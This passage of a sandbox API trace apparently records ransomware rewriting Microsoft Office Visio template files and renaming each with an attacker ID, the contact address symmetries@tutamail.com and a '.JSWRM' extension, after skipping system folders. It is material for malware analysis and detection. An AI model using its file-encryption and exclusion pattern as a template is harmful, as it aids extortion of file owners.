lpWideCharStr="EEFUND_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0147.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0147.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241218, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0147.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0147.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0147.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0147.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0147.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0147.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0147.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.908] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=130615) returned 1 [0147.908] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fe30) returned 0x2501e8 [0147.908] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1fe30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1fe30, lpOverlapped=0x0) returned 1 [0147.917] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.917] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1fe30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1fe30, lpOverlapped=0x0) returned 1 [0147.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.919] CloseHandle (hObject=0x314) returned 1 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0147.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0147.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0147.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0147.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0147.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.919] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0147.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0147.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0147.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0147.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0147.921] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x38d65f7, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x38d65f7, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x38d65f7, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1e894, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEFUND_VISIO2013_U.VSSX", cAlternateFileName="EEFUND~4.VSS")) returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2=".") returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="..") returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="...") returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="documents and settings") returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0147.921] lstrcmpiW (lpString1="EEFUND_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0147.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0147.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0147.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0147.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.922] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125076) returned 1 [0147.922] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e890) returned 0x2501e8 [0147.923] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1e890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1e890, lpOverlapped=0x0) returned 1 [0147.934] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.934] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1e890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1e890, lpOverlapped=0x0) returned 1 [0147.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.935] CloseHandle (hObject=0x314) returned 1 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0147.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0147.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0147.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0147.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0147.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.936] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0147.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0147.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0147.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0147.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.937] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a6bc7c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a6bc7c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a6bc7c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x46b8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEGENR_M.VSTX", cAlternateFileName="EEGENR~1.VST")) returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2=".") returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="..") returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="...") returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="windows") returned -1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="recovery") returned -1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="perflogs") returned -1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="documents and settings") returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.937] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="system volume information") returned -1 [0147.938] lstrcmpiW (lpString1="EEGENR_M.VSTX", lpString2="msocache") returned -1 [0147.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEGENR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0147.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEGENR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0147.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0147.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.939] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18104) returned 1 [0147.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46b0) returned 0x27b348 [0147.940] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x46b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x46b0, lpOverlapped=0x0) returned 1 [0147.942] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.942] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x46b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x46b0, lpOverlapped=0x0) returned 1 [0147.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.942] CloseHandle (hObject=0x314) returned 1 [0147.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0147.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0147.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0147.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0147.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0147.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0147.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0147.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0147.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.944] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a6bc7c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a6bc7c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a91d98, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4266, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEGENR_U.VSTX", cAlternateFileName="EEGENR~2.VST")) returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2=".") returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="..") returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="...") returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="windows") returned -1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="recovery") returned -1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="perflogs") returned -1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="documents and settings") returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="system volume information") returned -1 [0147.944] lstrcmpiW (lpString1="EEGENR_U.VSTX", lpString2="msocache") returned -1 [0147.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0147.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, 